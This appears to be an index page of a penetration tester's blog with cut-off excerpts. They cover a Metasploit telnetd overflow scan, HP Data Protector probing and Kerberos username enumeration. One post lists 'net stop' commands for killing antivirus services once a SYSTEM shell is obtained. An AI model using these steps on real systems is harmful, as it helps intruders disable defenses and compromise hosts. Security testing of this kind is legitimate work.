Older posts
Newer posts

FreeBSD Derived telnetd service Exploit

Published January 18, 2012 | By phillips321

Mentioned by hdm here and here but I wanted to make a note of this myself. First thing to do is setup the scan to look for vulnerable telnetd services:

12345msf > use auxiliary/scanner/telnet/telnet_encrypt_overflow msf  auxiliary(telnet_encrypt_overflow) > set RHOSTS 192.168.0.0/24 RHOSTS => 192.168.0.0/24 msf  auxiliary(telnet_encrypt_overflow) > set THREADS 64 THREADS => 64

And now to run the scan

123456789101112131415msf  auxiliary(telnet_encrypt_overflow) > run [*] 192.168.0.1:23 Does not support encryption: Netgear Embedded… Continue reading
Posted in metasploit, Networking | Tagged , , , , | Leave a comment

HP Data Protector <6.20 vulnerability

Published January 18, 2012 | By phillips321

Ok so on a job I found a service running on TCP port 5555 on a few servers. A little probing with netcat allowed me to identify the service(all of the output below is from my own testbed, hence the local 192.168.x.x IPs):

1234root@bt:~# nc 192.168.0.18 5555 break HP Data Protector A.06.11: INET, internal build 243, built on 25 August 2009, 13:08 root@bt:~#

This version is flagged as vulnerable as… Continue reading

Posted in Networking, Uncategorized | Tagged , , , , | 3 Comments

Connecting to HTTPS services from the terminal

Published January 17, 2012 | By phillips321

A little brain issue prevented me from remembering how to connect to a HTTPS service on the command line. NetCat doesnt seems to work, it just hangs. Fortunately after wasting sometime i recalled how to do it in not one but 2 ways: Option 1 : ncat (part of the nmap tool kit)

12345678910111213root@bt:~# ncat --ssl www.phillips321.co.uk 443 OPTIONS / HTTP/1.1 Host:www.phillips321.co.uk HTTP/1.1 200 OK Date: Tue, 17 Jan 2012… Continue reading
Posted in Linux | Tagged , , , | Leave a comment

Quickly disable security apps

Published December 20, 2011 | By phillips321

So you’ve got shell access to a remote box as SYSTEM and you want to upload some tools but you keep getting halted by antivirus and the like.

Here’s a quick list of services to kill:

123456789101112131415161718192021222324252627282930313233343536373839404142434445464748495051525354555657585960616263646566676869707172737475767778798081828384858687888990919293949596979899100101102103104105106107108109110111112113114115116117118119120121122123124125126127128129130131132133134135136137138139140141142143144145146147148149150151152153154155156157158159160161net stop "Ahnlab Task Scheduler" net stop "altiris client service" net stop ANTIVIR net stop ATRACK net stop "avast! antivirus" net stop "avast! iavs4 control service" net stop AVCONSOL net stop "AVG6 Service" net… Continue reading
Posted in Uncategorized | Tagged , , , , , | Leave a comment

Username enumeration, the new way

Published December 20, 2011 | By phillips321

So we’ve all played with RID cycling and GetAcct.exe but lately I guess we’ve not been pulling this out of our bag. Protection against this is now normal so we need a new way to enumerate usernames against a given domain. New info on this website is pointing towards a tool called ebrute that will allow enumeration of kerberos without having to take a password guess. On a decent machine… Continue reading

Posted in Uncategorized | Tagged , , , , , , | Leave a comment
Older posts
Newer posts

Please feel free to share my content but always link back here :-)